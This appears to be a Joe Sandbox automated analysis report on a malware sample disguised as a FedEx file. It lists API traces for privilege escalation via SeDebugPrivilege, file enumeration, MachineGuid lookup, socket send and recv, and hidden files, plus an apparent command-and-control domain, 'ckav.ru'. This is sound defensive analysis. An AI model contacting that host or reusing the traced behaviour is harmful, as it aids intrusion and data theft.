Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af279b22f47e81af69cc35f78ec2629520cf0c4d9ab844f4a6513559b5dd9d45
Instruction ID: ff4bd44b33bd26140e8e9a47abaf47f2a18637f0f03a808b2c14001ea57fbb2e
Opcode Fuzzy Hash: af279b22f47e81af69cc35f78ec2629520cf0c4d9ab844f4a6513559b5dd9d45
Instruction Fuzzy Hash: C0410970D497588FEB69CF6A8C007D9BFB6AF8A300F04C1EAD448A7266D7750986CF41

Analysis Process: FedEx_776282383902.exePID: 6192, Parent PID: 6752COMMON

Execution Graph

Execution Coverage:	31.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
